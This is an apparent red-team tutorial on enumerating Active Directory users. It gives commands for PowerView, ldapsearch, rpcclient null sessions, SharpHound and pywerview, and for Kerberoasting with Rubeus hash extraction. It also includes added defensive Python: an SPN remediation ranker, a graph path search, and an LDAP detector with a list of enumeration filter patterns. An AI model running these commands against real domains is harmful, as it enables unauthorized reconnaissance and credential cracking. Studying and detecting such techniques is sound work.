Introduction:
Active Directory (AD) user enumeration is the reconnaissance bedrock of every red team operation and real-world cyberattack. By systematically discovering domain users, group memberships, and hidden privileges, attackers map the attack surface, identify high‑value targets like Domain Admins, and uncover misconfigurations such as Kerberoastable SPNs or dangerous ACLs – all before firing a single exploit.
Learning Objectives:
- Execute comprehensive AD user enumeration using PowerView, pywerview, and native Windows/Linux tools.
- Identify privileged accounts, SPNs for Kerberoasting, and ACL misconfigurations via LDAP queries and BloodHound.
- Understand attack path mapping from enumeration data to privilege escalation, and apply mitigations to harden AD environments.
You Should Know:
1. Enumerating All Domain Users with PowerView (Windows)
PowerView is a PowerShell tool from the PowerSploit framework that provides deep AD reconnaissance. The `Get-NetUser` cmdlet retrieves every user object, including attributes like `samaccountname`, `pwdLastSet`, `lastlogon`, and `description` (often containing credentials).
Step‑by‑Step Guide:
- Load PowerView: `Import-Module .\PowerView.ps1`
- Enumerate all users: `Get-NetUser | select name, samaccountname, description, pwdlastset, lastlogon`
- Find users with empty passwords (accounts carrying the PASSWD_NOTREQD flag, bit 0x20 of `userAccountControl`, matched with an LDAP bitwise filter): `Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=32)"`
- Export to CSV: `Get-NetUser | Export-Csv -Path user_enum.csv`
What it does: Queries the domain's LDAP directory (port 389/TCP) using the current user's context, returning all user objects. Use it to spot inactive accounts, stale passwords (old `pwdLastSet` values), or secrets leaked in `description` fields.
2. Linux‑Based User Enumeration Using ldapsearch and rpcclient
On a Linux attack host, you can directly query AD via LDAP or SMB RPC. `ldapsearch` sends authenticated or anonymous binds to retrieve user entries; `rpcclient` uses null sessions (if allowed) to list users.
Step‑by‑Step Guide:
- Install tools: `sudo apt install ldap-utils smbclient`
- Authenticated LDAP enumeration:
`ldapsearch -x -H ldap://<dc-ip> -D "CN=user,CN=Users,DC=domain,DC=com" -W -b "DC=domain,DC=com" "(&(objectCategory=person)(objectClass=user))" sAMAccountName userPrincipalName`
- Null session via rpcclient:
`rpcclient -U "" -N <dc-ip>` then inside: `enumdomusers`
- Using enum4linux: `enum4linux -U <dc-ip>`
What it does: `ldapsearch` performs LDAP queries to extract user DNs and attributes (the `objectCategory=person` clause keeps computer accounts out of the result); `rpcclient` leverages legacy SMB protocols. Combine with `grep` to filter privileged accounts.
3. Extracting SPNs for Kerberoasting (setspn & PowerView)
Service Principal Names (SPNs) link services to user or computer accounts. Accounts with SPNs (e.g., SQL, HTTP) are Kerberoasting candidates – their password hashes can be cracked offline.
Step‑by‑Step Guide (Windows):
- Using native setspn: `setspn -T <domain> -Q */*` lists all SPNs. Focus on user accounts (not computers): `setspn -T <domain> -Q */* | findstr /B "CN=" | findstr /V /I "CN=Computers OU=Domain Controllers"`
- PowerView: `Get-NetUser -SPN | select samaccountname, serviceprincipalname`
- Extract hashes: `Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/websvc.domain.com"` then use `mimikatz` or `Rubeus` to retrieve the ticket: `Rubeus.exe kerberoast /outfile:hashes.txt`
What it does: Queries AD for objects with non‑null `servicePrincipalName` attribute. Attackers then request a TGS for that service and crack the RC4_HMAC hash offline.
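The same SPN data read from the defender's side: an added example (not code from the original post) that takes an exported snapshot of accounts, keeps only the Kerberoasting candidates the section describes (user objects with an SPN, skipping computers and gMSAs), and orders them by how urgently they need remediation: RC4 still permitted in `msDS-SupportedEncryptionTypes`, a password older than a year, or membership in a privileged group. The attribute names are real AD attributes; the records, the reference date `AS_OF`, and the one-point-per-finding ranking are assumptions made for this example.

```python
"""Rank SPN-bearing user accounts by remediation priority (added example)."""
from datetime import datetime, timezone

# msDS-SupportedEncryptionTypes bit flags as documented by Microsoft
RC4_HMAC = 0x4
AES128_CTS_HMAC_SHA1 = 0x8
AES256_CTS_HMAC_SHA1 = 0x10

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Account Operators"}

# Reference date for password-age calculations (an assumption for this example)
AS_OF = datetime(2025, 1, 1, tzinfo=timezone.utc)

# Constructed sample snapshot: one dict per account, keyed by real AD attribute names
SNAPSHOT = [
    {"sAMAccountName": "svc_sql", "objectClass": ["user"],
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.com:1433"],
     "msDS-SupportedEncryptionTypes": 0, "pwdLastSet": "2019-03-01",
     "memberOf": ["CN=Domain Admins,CN=Users,DC=domain,DC=com"]},
    {"sAMAccountName": "svc_backup", "objectClass": ["user"],
     "servicePrincipalName": ["backup/bk01.domain.com"],
     "msDS-SupportedEncryptionTypes": AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1,
     "pwdLastSet": "2024-01-15", "memberOf": []},
    {"sAMAccountName": "svc_web$", "objectClass": ["user", "msDS-GroupManagedServiceAccount"],
     "servicePrincipalName": ["HTTP/websvc.domain.com"],
     "msDS-SupportedEncryptionTypes": AES256_CTS_HMAC_SHA1, "pwdLastSet": "2024-12-01",
     "memberOf": []},
    {"sAMAccountName": "WS01$", "objectClass": ["user", "computer"],
     "servicePrincipalName": ["HOST/ws01.domain.com"],
     "msDS-SupportedEncryptionTypes": AES256_CTS_HMAC_SHA1, "pwdLastSet": "2024-12-20",
     "memberOf": []},
    {"sAMAccountName": "jdoe", "objectClass": ["user"], "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": 0, "pwdLastSet": "2024-11-01", "memberOf": []},
]


def is_kerberoastable_user(acct):
    """User objects with at least one SPN, excluding computers and gMSAs."""
    classes = set(acct.get("objectClass", []))
    if not acct.get("servicePrincipalName"):
        return False
    return not ({"computer", "msDS-GroupManagedServiceAccount"} & classes)


def password_age_days(acct, as_of):
    """Days since pwdLastSet (ISO date string in this constructed snapshot)."""
    set_on = datetime.strptime(acct["pwdLastSet"], "%Y-%m-%d").replace(tzinfo=timezone.utc)
    return (as_of - set_on).days


def group_cn(dn):
    """First RDN value of a DN: 'CN=Domain Admins,CN=Users,...' -> 'Domain Admins'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def review(snapshot, as_of=AS_OF, max_age_days=365):
    """Return kerberoastable accounts with their findings, highest priority first."""
    results = []
    for acct in snapshot:
        if not is_kerberoastable_user(acct):
            continue
        findings = []
        enc = acct.get("msDS-SupportedEncryptionTypes", 0)
        # 0 (unset) means the DC will still issue RC4 tickets for this account
        if enc == 0 or enc & RC4_HMAC:
            findings.append("rc4-allowed")
        if password_age_days(acct, as_of) > max_age_days:
            findings.append("stale-password")
        if any(group_cn(dn) in PRIVILEGED_GROUPS for dn in acct.get("memberOf", [])):
            findings.append("privileged")
        results.append({"account": acct["sAMAccountName"], "findings": findings})
    return sorted(results, key=lambda r: (-len(r["findings"]), r["account"]))


if __name__ == "__main__":
    for row in review(SNAPSHOT):
        print(f"{row['account']:<12} {', '.join(row['findings']) or 'no findings'}")
```

On the sample data `svc_sql` comes out first with all three findings, while `svc_backup` is still a candidate but has nothing to fix beyond the usual long random password; the gMSA and the computer account are not reported at all, which is exactly why moving service accounts to gMSA (section 7) removes them from this list.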
4. Identifying Privileged Groups and Admin Accounts
Attackers focus on groups like Domain Admins, Enterprise Admins, and Account Operators. Enumerating group members reveals escalation paths.
Step‑by‑Step Guide (Windows/cmd & PowerShell):
- Native cmd:
`net group "Domain Admins" /domain`
`net localgroup "Administrators" /domain`
- PowerView:
`Get-NetGroupMember "Domain Admins"`
`Get-NetLocalGroup -ComputerName <host>` (enumerates the local Administrators group of a remote host)
- Linux via ldapsearch:
`ldapsearch -x -H ldap://<dc-ip> -D "<user>@domain.com" -W -b "DC=domain,DC=com" "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)" sAMAccountName`
What it does: Queries group membership recursively. Use it to map admin accounts, then target them with pass‑the‑hash, phishing, or lateral movement.
5. Mapping Attack Paths with BloodHound and SharpHound
BloodHound visualizes AD relationships – user sessions, group memberships, ACLs, and computer ownership. It transforms enumeration data into a graph database, revealing the shortest path to Domain Admin.
Step‑by‑Step Guide (Windows and Linux):
- On Windows (collector): Download SharpHound, run:
`SharpHound.exe -c All --outputdirectory C:\data`
- On Linux: Use `bloodhound-python` (the BloodHound.py collector, built on Impacket's libraries):
`bloodhound-python -d domain.com -u user -p pass -ns <dns-ip> -c all`
- Upload the generated `.json` files to the BloodHound Neo4j database.
- In BloodHound UI: Use pre-built queries like "Find all Domain Admins" or "Shortest Paths to Domain Admin".
What it does: SharpHound enumerates user sessions, group memberships, and ACLs over LDAP and SMB. BloodHound's graph analysis highlights attack vectors like "Member of High-Value Group" or "CanRDP".
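What the BloodHound graph computes, reduced to its core, as an added example that is neither SharpHound nor BloodHound code and not part of the original post: a breadth-first search over a constructed edge list in the (source, relationship, target) shape SharpHound emits. `effective_members` resolves nested group membership (the recursive lookup section 4 describes), `shortest_path` reproduces "Shortest Paths to Domain Admin", and `principals_with_path` lists every principal that can reach the Domain Admins group and in how many hops, which is the blast radius a defender wants to shrink. All node names and edges are constructed sample data.

```python
"""Path analysis over a BloodHound-style edge list (added example)."""
from collections import deque

DOMAIN_ADMINS = "DOMAIN ADMINS@DOMAIN.COM"

# Constructed sample edges in the (source, relationship, target) shape SharpHound emits
EDGES = [
    ("JDOE@DOMAIN.COM", "MemberOf", "HELPDESK@DOMAIN.COM"),
    ("HELPDESK@DOMAIN.COM", "AdminTo", "WS01.DOMAIN.COM"),
    ("WS01.DOMAIN.COM", "HasSession", "SVC_SQL@DOMAIN.COM"),
    ("SVC_SQL@DOMAIN.COM", "MemberOf", "SQL ADMINS@DOMAIN.COM"),
    ("SQL ADMINS@DOMAIN.COM", "MemberOf", DOMAIN_ADMINS),
    ("ALICE@DOMAIN.COM", "MemberOf", DOMAIN_ADMINS),
    ("BOB@DOMAIN.COM", "MemberOf", "MARKETING@DOMAIN.COM"),
]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def shortest_path(adj, start, goal):
    """Breadth-first search; returns the hops as (src, rel, dst) triples, or None."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while prev[node] is not None:
                parent, rel = prev[node]
                hops.append((parent, rel, node))
                node = parent
            return hops[::-1]
        for rel, nxt in adj.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


def effective_members(adj, group):
    """Principals that are members of `group` directly or through nested groups."""
    reverse = {}
    for src, rels in adj.items():
        for rel, dst in rels:
            if rel == "MemberOf":
                reverse.setdefault(dst, []).append(src)
    members, stack = set(), [group]
    while stack:
        for member in reverse.get(stack.pop(), []):
            if member not in members:
                members.add(member)
                stack.append(member)
    return members


def principals_with_path(adj, goal):
    """Every node that can reach `goal`, mapped to its hop count."""
    reach = {}
    for node in adj:
        path = shortest_path(adj, node, goal)
        if node != goal and path is not None:
            reach[node] = len(path)
    return reach


if __name__ == "__main__":
    graph = build_graph(EDGES)
    for src, rel, dst in shortest_path(graph, "JDOE@DOMAIN.COM", DOMAIN_ADMINS):
        print(f"{src} -[{rel}]-> {dst}")
    print("effective DA members:", sorted(effective_members(graph, DOMAIN_ADMINS)))
    print("can reach DA:", principals_with_path(graph, DOMAIN_ADMINS))
```

In the sample graph an ordinary help-desk user reaches Domain Admins in five hops because a DA-equivalent service account has a session on a workstation the help desk administers; the `HasSession` edge is the one a defender removes (by keeping privileged service accounts off workstations), and `SVC_SQL` shows up as an effective Domain Admin even though it is only a direct member of `SQL ADMINS`.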
6. Using pywerview for Cross‑Platform User Enumeration
`pywerview` is a Python rewrite of PowerView, ideal for Linux/macOS environments. It leverages Impacket’s SMB and LDAP libraries to execute remote enumeration without any Windows agent.
Step‑by‑Step Guide:
- Install: `git clone https://github.com/the-useless-one/pywerview.git; cd pywerview; pip install -r requirements.txt`
- Enumerate all users:
`python3 pywerview.py get-netuser -u "domain\user" -p "password" -t <dc-ip>`
- Get group members:
`python3 pywerview.py get-netgroupmember -g "Domain Admins" -u "domain\user" -p "password" -t <dc-ip>`
- Find SPNs:
`python3 pywerview.py get-netuser -spn -u "domain\user" -p "password" -t <dc-ip>`
What it does: Connects to AD via SMB (port 445) or LDAP, mimicking PowerView’s functionality. It’s useful when you need a non‑PowerShell, cross‑platform tool for red team infrastructure.
7. Mitigation Strategies Against User Enumeration
Defenders can limit enumeration by hardening LDAP signing, disabling null sessions, and implementing account lockout policies. However, a determined attacker with a valid domain user credential will always have some enumeration capability – focus on detecting suspicious query patterns.
Step‑by‑Step Mitigation:
- Disable anonymous LDAP queries (Windows Server 2016+ default):
`reg add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v RestrictAnonymousLDAP /t REG_DWORD /d 2 /f`
- Enable LDAP signing and channel binding: Group Policy → Computer Config → Admin Templates → System → Net Logon → "LDAP server signing requirements" set to "Require signing".
- Audit enumeration attempts: Enable logging for event IDs 4662 (Directory Service Access) and 4624 (logon). Use Sysmon or UEBA to detect high-volume LDAP queries from a single source.
- Limit who can query SPNs: Harden service account permissions; use group Managed Service Accounts (gMSA).
What it does: Restricting anonymous binds blocks passive enumeration (e.g., `rpcclient -U ""`), while LDAP signing prevents tampering. Active logging helps detect lateral movement preparation.
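The "detect high-volume LDAP queries from a single source" step, written out as an added example (not code from the original post): it runs two checks over query records, a list of filter shapes that match the enumeration commands in this post but rarely come from normal applications, and a per-client sliding-window count. The record shape (timestamp, client IP, account, LDAP filter) is a constructed simplification; in practice the rows come from a source that records the filter, such as NTDS Directory Service event 1644 once its diagnostic logging is raised, or an LDAP network sensor. The regex list, the 60-second window and the 25-query threshold are assumptions to tune per environment.

```python
"""Flag enumeration-style LDAP activity in query records (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Filter shapes that match the enumeration commands in this post. (name, regex) pairs.
ENUMERATION_PATTERNS = [
    ("user-dump", re.compile(r"^\(objectClass=user\)$", re.I)),
    ("spn-sweep", re.compile(r"\(servicePrincipalName=\*\)", re.I)),
    ("account-type-sweep", re.compile(r"sAMAccountType=", re.I)),
    ("admin-group-lookup", re.compile(r"memberOf=CN=(Domain|Enterprise) Admins", re.I)),
    ("uac-bit-filter", re.compile(r"userAccountControl:1\.2\.840\.113556\.1\.4\.803:=", re.I)),
]

# Constructed sample records: (ISO timestamp, client IP, account, LDAP filter)
LOG = [
    ("2025-01-01T09:00:00", "10.0.0.20", "outlook-svc", "(&(objectClass=user)(mail=alice@domain.com))"),
    ("2025-01-01T09:00:01", "10.0.0.77", "jdoe", "(objectClass=user)"),
    ("2025-01-01T09:00:02", "10.0.0.77", "jdoe", "(servicePrincipalName=*)"),
    ("2025-01-01T09:00:03", "10.0.0.77", "jdoe", "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)"),
    ("2025-01-01T09:05:00", "10.0.0.20", "outlook-svc", "(&(objectClass=user)(mail=bob@domain.com))"),
]
# A constructed burst of thirty per-account lookups from the same client, one per second
LOG += [(f"2025-01-01T09:00:{10 + i:02d}", "10.0.0.77", "jdoe", f"(sAMAccountName=user{i})")
        for i in range(30)]


def classify_filter(ldap_filter):
    """Names of the enumeration patterns a filter matches (empty list if none)."""
    return [name for name, pattern in ENUMERATION_PATTERNS if pattern.search(ldap_filter)]


def detect(records, window=timedelta(seconds=60), threshold=25):
    """Return alerts for suspicious filters and for query bursts per client.

    A client is reported for volume once, the first time it exceeds `threshold`
    queries inside a sliding `window`. Records are processed in timestamp order.
    """
    alerts = []
    recent = defaultdict(deque)   # client -> timestamps inside the current window
    volume_flagged = set()
    for ts, client, account, ldap_filter in sorted(records):
        now = datetime.fromisoformat(ts)
        tags = classify_filter(ldap_filter)
        if tags:
            alerts.append({"type": "enumeration-filter", "client": client,
                           "account": account, "filter": ldap_filter, "tags": tags})
        timestamps = recent[client]
        timestamps.append(now)
        while now - timestamps[0] > window:   # drop entries that fell out of the window
            timestamps.popleft()
        if len(timestamps) > threshold and client not in volume_flagged:
            volume_flagged.add(client)
            alerts.append({"type": "query-volume", "client": client,
                           "account": account, "count": len(timestamps)})
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG):
        print(alert)
```

The scoped mail lookups from `10.0.0.20` never alert, because `user-dump` only matches a bare `(objectClass=user)` filter; the three targeted filters from `10.0.0.77` each raise a filter alert, and the burst of per-account lookups raises one volume alert as soon as the 26th query lands inside the window. Pairing the client IP with the 4624 logon that preceded it turns these into an account to investigate.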
What Undercode Says:
- User enumeration is not a “noisy” exploit – most AD environments allow LDAP reads by any authenticated user. This makes it a silent, persistent reconnaissance technique.
- Combining PowerView/BloodHound with automatic graph analysis turns raw user lists into actionable attack paths, drastically reducing time to Domain Admin compromise.
Analysis: Modern AD attacks no longer rely on buffer overflows; they abuse native protocols and legitimate queries. Defenders must shift from perimeter blocking to behavioral detection – monitoring for unusual LDAP filters (e.g., `(sAMAccountType=)` queries), excessive `setspn` executions, or sudden BloodHound collector deployments. Red teams should always start with user enumeration: without knowing “who” is in the domain, privilege escalation is blind. The rise of cloud‑synced identities (Azure AD Connect) means enumeration now extends to hybrid environments, where a single on‑prem user enumeration can reveal cloud roles and applications.
Prediction:
As Microsoft pushes pass‑key authentication and token binding, traditional password‑based Kerberoasting may decline, but user enumeration will pivot to OAuth2 and SAML token discovery. Attackers will use enumeration to map service principals, app roles, and federated trust relationships. Automated enumeration bots integrated with LLMs will soon generate natural language attack path reports in real time, forcing a new generation of identity threat detection and response (ITDR) platforms focused on query heuristics rather than signature matching. The future AD attack will not start with a tool – it will start with a single `ldapsearch` and a cleverly crafted filter.
Reported By: Activedirectory Redteam – Hackers Feeds